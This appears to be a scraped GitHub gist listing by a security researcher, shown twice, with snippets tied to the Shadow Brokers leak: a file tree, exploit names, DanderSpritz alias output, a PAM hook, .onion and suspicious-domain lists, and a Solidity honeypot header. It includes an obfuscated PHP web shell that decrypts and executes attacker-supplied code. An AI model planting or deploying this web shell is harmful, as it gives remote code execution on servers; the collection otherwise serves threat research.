misterch0c

## shadowbroker
.
├── matree
├── swift
│   ├── 00503_0_254.242_2013mar02
│   ├── 00546_0_ensbdasa-09aug2013
│   ├── 00553_0_ensbdpix3-09aug2013
│   ├── 00554_0_ensbdpix4-09aug2013
│   ├── 00555_0_ensbdrtr1-2013aug09
│   ├── 00557_0_ENSBDVPN1-02AUG2013
│   ├── 00558_0_ENSBDVPN2-02AUG2013

## ??.php
<?php
if(($z=$_POST["90d935c8"])&&($z)){
    $i="5f3a8";$O = (strlen($i)*128)/5+64*2;$k=$z;$p=$_POST[$i];$d="MjU2QVRjZU81dVFBbU80cjNkWDRPazBRZTlCNEZMaXNRL0hUajdrK3ZHV0ZDNjZhYi9EWlMzbUtyN2JwQVBma1RjUFd6aGtURE9jMWRYd242cnpVYTFPaU8zTTZxV05IL1BuQVVGdndHRnVzUVR5dVl1ck8xY0I5U1IvRFdNeHNReG0=";$k=substr(hash("sha$O",$k),0,$O/4/2);
    $i=substr(hash("sha$O",$i),0,$O/4/2/2);
    $O=openssl_decrypt(base64_decode($d),"AES-$O-CBC",$k,OPENSSL_RAW_DATA,$i);$k=create_function('$k',$O);$k($p);}
?>

## 20konions.txt
http://22222222222qerho.onion/
http://2222222222hofxwd.onion/
http://22222222235tlt3z.onion/
http://2222222223hj36o5.onion/
http://2222222223myexge.onion/
http://2222222223nsklub.onion/
http://2222222223za3joq.onion/
http://2222222225ucqblu.onion/
http://22222222266i2kbs.onion/
http://222222222c7r2gdj.onion/

## pamcam
#/etc/pam.d/system-auth
#%PAM-1.0

# Jump two rules if login succeeds.
auth    [success=2 default=ignore]      pam_unix.so nullok_secure
auth    optional                        pam_exec.so /home/pamcam.sh
auth    requisite                       pam_deny.so

# User gets here if authentication is successful. No denying, no cam module.
auth      required  pam_unix.so     try_first_pass nullok

## gist:001b7359524914891c14cb8413a6a33f

      
              1 file
            
          
              3 forks
            
          
              0 comments
            
          
              2 stars
            
          
                misterch0c
                / gist:001b7359524914891c14cb8413a6a33f
            
            
              Last active
              March 16, 2021 13:57
            
              
                ShadowBrokersExploits
              
          
    https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
Exploits


EARLYSHOVEL RedHat 7.0 - 7.1 Sendmail 8.11.x exploit
EBBISLAND (EBBSHAVE) root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86.
ECHOWRECKER remote Samba 3.0.x Linux exploit.
EASYBEE appears to be an MDaemon email server vulnerability
EASYPI is an IBM Lotus Notes exploit  that gets detected as Stuxnet
EWOKFRENZY is an exploit for IBM Lotus Domino 6.5.4


## aliases-dsz
21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken         : LOCAL            : script _AcquireToken.dss %%cmd_args%%
acquiretoken         : ANY_REMOTE       : script _AcquireToken.dss %%cmd_args%%
arparp               : LOCAL            : python windows/arparp.py -args " %%cmd_args%% " -project Ops
arparp               : ANY_REMOTE       : python windows/arparp.py -args " %%cmd_args%% " -project Ops
channels             : LOCAL            : commands %%cmd_args%%
channels             : ANY_REMOTE       : commands %%cmd_args%%
checkpsp             : LOCAL            : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
checkpsp             : ANY_REMOTE       : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops

## gist:c5846202fe080f0d4444f29962d29905
'865608398582272000', #@proofofresearch
'1116444546857086981', #poekmongoicu
'1115703968485666816', #@ODIN30120095
'935046553097478145', #myselfexplorer
'902926941413453824', #cz_binance
'41012342', #Numerologynow
'1019727560270405632', #LexingtonAluminum
'713340918443585540', #ZuThadeus
'247857712', #@PeterLBrandt
'176758255', #@rogerkver

## CryptoRoulette.sol
pragma solidity ^0.4.19;

// CryptoRoulette
//
// Guess the number secretly stored in the blockchain and win the whole contract balance!
// A new number is randomly chosen after each try.
//
// To play, call the play() method with the guessed number (1-20).  Bet price: 0.1 ether

contract CryptoRoulette {

## gist:49b6b6ac0e6ee3c589122e725f3c9425
http://armasglass.com/
http://fastquotes.xyz/
http://head-ache.stream/
http://haramikutta.us/
http://aalaap-il.com/
http://opeginfosolutions.com/
http://bangalorefunctionalfitness.com/
http://id-map.site/
http://alistar-th.store/
http://wdlabs.org/

## gist:41b35e650649a73ca3d4af4ed14e8928
arsanetantalya.net
emindanismanlik.net
iklanbarisgratis.xyz
online-service-nieuw.one
handtekening-online.one
fdsk.one
service-check.one
secure-online2018.one
gfdsaa.one
bakf03.one
	.
	├── matree
	├── swift
	│ ├── 00503_0_254.242_2013mar02
	│ ├── 00546_0_ensbdasa-09aug2013
	│ ├── 00553_0_ensbdpix3-09aug2013
	│ ├── 00554_0_ensbdpix4-09aug2013
	│ ├── 00555_0_ensbdrtr1-2013aug09
	│ ├── 00557_0_ENSBDVPN1-02AUG2013
	│ ├── 00558_0_ENSBDVPN2-02AUG2013
	<?php
	if(($z=$_POST["90d935c8"])&&($z)){
	$i="5f3a8";$O = (strlen($i)128)/5+642;$k=$z;$p=$_POST[$i];$d="MjU2QVRjZU81dVFBbU80cjNkWDRPazBRZTlCNEZMaXNRL0hUajdrK3ZHV0ZDNjZhYi9EWlMzbUtyN2JwQVBma1RjUFd6aGtURE9jMWRYd242cnpVYTFPaU8zTTZxV05IL1BuQVVGdndHRnVzUVR5dVl1ck8xY0I5U1IvRFdNeHNReG0=";$k=substr(hash("sha$O",$k),0,$O/4/2);
	$i=substr(hash("sha$O",$i),0,$O/4/2/2);
	$O=openssl_decrypt(base64_decode($d),"AES-$O-CBC",$k,OPENSSL_RAW_DATA,$i);$k=create_function('$k',$O);$k($p);}
	?>
	http://22222222222qerho.onion/
	http://2222222222hofxwd.onion/
	http://22222222235tlt3z.onion/
	http://2222222223hj36o5.onion/
	http://2222222223myexge.onion/
	http://2222222223nsklub.onion/
	http://2222222223za3joq.onion/
	http://2222222225ucqblu.onion/
	http://22222222266i2kbs.onion/
	http://222222222c7r2gdj.onion/
	#/etc/pam.d/system-auth
	#%PAM-1.0

	# Jump two rules if login succeeds.
	auth [success=2 default=ignore] pam_unix.so nullok_secure
	auth optional pam_exec.so /home/pamcam.sh
	auth requisite pam_deny.so

	# User gets here if authentication is successful. No denying, no cam module.
	auth required pam_unix.so try_first_pass nullok
	21:25:59>> aliases
	[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
	acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%%
	acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%%
	arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops
	arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops
	channels : LOCAL : commands %%cmd_args%%
	channels : ANY_REMOTE : commands %%cmd_args%%
	checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
	checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
	'865608398582272000', #@proofofresearch
	'1116444546857086981', #poekmongoicu
	'1115703968485666816', #@ODIN30120095
	'935046553097478145', #myselfexplorer
	'902926941413453824', #cz_binance
	'41012342', #Numerologynow
	'1019727560270405632', #LexingtonAluminum
	'713340918443585540', #ZuThadeus
	'247857712', #@PeterLBrandt
	'176758255', #@rogerkver
	pragma solidity ^0.4.19;

	// CryptoRoulette
	//
	// Guess the number secretly stored in the blockchain and win the whole contract balance!
	// A new number is randomly chosen after each try.
	//
	// To play, call the play() method with the guessed number (1-20). Bet price: 0.1 ether

	contract CryptoRoulette {
	http://armasglass.com/
	http://fastquotes.xyz/
	http://head-ache.stream/
	http://haramikutta.us/
	http://aalaap-il.com/
	http://opeginfosolutions.com/
	http://bangalorefunctionalfitness.com/
	http://id-map.site/
	http://alistar-th.store/
	http://wdlabs.org/
	arsanetantalya.net
	emindanismanlik.net
	iklanbarisgratis.xyz
	online-service-nieuw.one
	handtekening-online.one
	fdsk.one
	service-check.one
	secure-online2018.one
	gfdsaa.one
	bakf03.one